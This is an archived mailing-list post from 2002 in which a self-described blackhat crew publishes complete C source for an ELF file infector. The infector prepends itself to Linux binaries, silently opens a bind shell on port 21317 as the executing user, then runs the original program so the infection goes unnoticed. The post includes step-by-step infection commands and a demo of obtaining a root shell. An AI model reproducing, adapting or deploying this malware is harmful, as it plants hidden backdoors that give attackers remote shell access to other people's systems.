lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <200211290953.gAT9rdvB072223@mailserver2.hushmail.com>
From: es at hush.com (es@...h.com)
Subject: [ElectronicSouls] ELF warfare

-----BEGIN PGP SIGNED MESSAGE-----

Pioneered by silvio, perfected by Electronic Souls...


/*
 -----------------------------------------------------------
 [CONFIDENTIAL SOURCE MATERIAL OF THE ELECTRONIC-SOULS CREW]
 ------------------- DO NOT DISTRIBUTE ! -------------------
 -----------------------------------------------------------
              [ E l e c t r o n i c S o u l s ]
 [Invader] - append ELF infect0r - update of the underworld
                                               ELF Parasite
                                   (C) BrainStorm - 01-2002
 -----------------------------------------------------------
 Information :
 +++++++++++++
 This ELF Infector uses the appendage infection tekneeq!
 that means to two Executeables are appended together.
 The payload inside this parasite opens a port shell on the
 infected machine as the user who executed it.

 -----------------------------------------------------------

 to get it working :
 +++++++++++++++++++
 compile the code, then get the file size and change
 the define in the code, now recompile and we are done ;)

 example :
 i wrote a quick program that just prints a msg and shows
 the date so i can test the infection:

 [root@...inMachine x]# ./blah
 im a test prog that gets infected :>

 Sam Jan  5 14:22:43 CET 2002
 [root@...inMachine x]#

 thats how it looks like
 before the infection and after it, since the parasite
 extracts the host to a temp file and executes it, so you
 wont notice the infection unless you added some printf()s

 from another term:

 [root@...inMachine client]# telnet localhost 21317
 Trying 127.0.0.1...
 Connected to brainmachine.electronicsouls.org.
 Escape character is '^]'.
 uname -a;
 Linux BrainMachine.ElectronicSouls.org 2.2.17-14 #1 Wed Feb 14 13:51:00 CET 2001 i686 unknown
 : command not found
 id;
 uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
 : command not found

 ..now ph34r this ;)

 -----------------------------------------------------------

 to infect a binary :
 ++++++++++++++++++++
 cat /bin/binary >> para: mv para /bin/binary
 if binary gets executed it opens up a portshell ;)

 -----------------------------------------------------------

 special thanks to :
 +++++++++++++++++++
 ghQst and SectorX for making me interested in ELF infection
 and for beeing there for me since back in the days =)  !
 and PhaNtoM for providing me with that very small
 portshell code !

 shouts go out to all ElectronicSouls members - j00 r0ck =)

 -----------------------------------------------------------
    [ElectronicSouls]  -  Immortal Blackhat since 1995 ;)
 -----------------------------------------------------------

*/

/*
   the fearsome  t e k n e e q z  start here !

*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define  PARASIZE         18018                  /* dont forget to change me ! */
#define  TEMP             ".para.tmp"            /* tmp file                   */
#define  KILL(X)          exit(1)                /* we dont want to die..      */

int soc,cli;
struct sockaddr_in serv_addr;

int main(int argc, char *argv[], char *envp[])
{
        int  input,
            output,
            lenght;

        char *dope;
        struct stat stat;

        if(fork()==0) /* start of the portshell */
        {
        serv_addr.sin_family=2;
        serv_addr.sin_addr.s_addr=0;
        serv_addr.sin_port=(0x4553);
        soc=socket(2,1,6);
        bind(soc,(struct sockaddr *)&serv_addr,0x10);
        listen(soc,1);
        cli=accept(soc,0,0);
        dup2(cli,0);
        dup2(cli,1);
        dup2(cli,2);
        execl("/bin/sh","sh",0);
        }
        input = open("/proc/self/exe", O_RDONLY);

        if (input < 0)
        KILL("open(input)");

        if (fstat(input, &stat) < 0)
        KILL("fstat");

        lenght = stat.st_size - PARASIZE;
        dope = malloc(lenght);

        if (dope == NULL)
        KILL("malloc");

        if (lseek(input, PARASIZE, SEEK_SET) != PARASIZE)
        KILL("lseek(input)");

        if (read(input, dope, lenght) != lenght)
        KILL("read(input)");

        close(input);
        output = open(TEMP, O_RDWR | O_CREAT | O_TRUNC, stat.st_mode);

        if (output < 0)
        KILL("open(output)");

        if (write(output, dope, lenght) != lenght)
        KILL("write(output)");

        free(dope);
        close(output);

        exit(execve(TEMP, argv, envp));
}

The Electronic Souls Crew
[ElectronicSouls] (c) 2002

"Healthy, wealthy, and wise."

-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify

wlMEARECABMFAj3nO18MHGVzQGh1c2guY29tAAoJEN5nGqhGcjltkLoAoJgfB4HOklr/
Ezj3HsyHG0OtsGcIAKCgY/ggjGC+mD820NIEF92UMLfgLg==
=ooII
-----END PGP SIGNATURE-----




Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2 

Big $$$ to be made with the HushMail Affiliate Program: 
https://www.hushmail.com/about.php?subloc=affiliate&l=427

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ